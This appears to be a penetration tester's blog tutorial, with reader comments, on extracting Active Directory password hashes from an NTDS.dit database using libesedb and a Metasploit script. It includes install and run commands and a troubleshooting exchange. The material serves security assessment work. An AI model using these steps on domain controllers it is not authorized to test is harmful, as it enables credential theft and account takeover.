Earlier this week I released a blog post on the Accuvant website explaining at a high level some of the techniques and use cases for my recently developed Metasploit modules. This article will be the first in a series of tutorials where I plan to do a deeper dive into the individual modules and some of their many uses during an Information Security Assessment or Penetration Testing exercise.
The ntds_hashextract.rb script is a standalone tool that can be used to quickly and efficiently extract Active Directory domain password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can sometimes be tricky so here is a detailed tutorial covering the methodology that I use and continue to have success with.
Step 1 – Install Libesedb
Libesedb is an open source C library developed to forensically extract information from Extensible Storage Engine (ESE) database files. In order to get what we need out of NTDS.dit we will first have to download and install the library using the following URL
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz
Next we will need to extract the tarball, configure, make and install the library using the command line.
- $tar xvzf libesedb-alpha-20120102.tar.gz
- $cd libesedb-20120102
- $./configure
- $make && make install
This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5.
Step 2 – Export Tables From NTDS.dit
Now that you have a working install of the Libesedb library make sure you’ve got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. In case you weren’t already aware, you can use another one of my modules ntdsgrab.rb to obtain these items from a Windows Domain Controller, provided you have proper credentials or course. Here is what they look like on my system after downloading them via the Metasploit Framework.
Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory and run esedbexport from the libesedb/esedbtools directory against your NTDS.dit database. It will export all of the tables and store them in a newly created directory called ntds.export.
Step 3 – Dump All The Hashes
At this point you’re ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. If the domain is large enough (several thousand unique users) the command might take a few minutes to finish on your system so go grab a cup of coffee. When it’s done it should look something like this.
That’s all for now, check back soon for more in this series.
Thanks for reading.
Share this article
this should do it check spaces between datatable.3 & the script before. Place your file in the right directory. :D
ruby /opt/metasploit/msf3/tools/ntds_hashextract.rb ntds.export datatable.3 sys
Hi,
thanks for the write-up. I’m stresstesting the tools with an 8GB ntds.dit. The esedbexport process seems to be doing fine. 8 hours are past and my datatable.3 file is still growing steadily towards a similar size. Once this is finished there are multiple options to go. Do you have any recommendations or experience to confirm that this will work in a large scale environment ?
Thanks
Don
Hi,
I run this command:
ruby /opt/metasploit/msf3/tools/ntds_hashextract.rb ntds.export/datatable.3 sys
and get this result:
/opt/metasploit/msf3/tools/ntds_hashextract.rb:101:in `update’: can’t convert nil into String (TypeError)
from /opt/metasploit/msf3/tools/ntds_hashextract.rb:101:in `decrypt_pek’
from /opt/metasploit/msf3/tools/ntds_hashextract.rb:175:in `’
Do you have any idea why?
Yeah so this isn’t included in the metasploit framework yet. I am still workting things out with the developers. If you want it to work you need to clone the entire pentestgeek repo and run from there.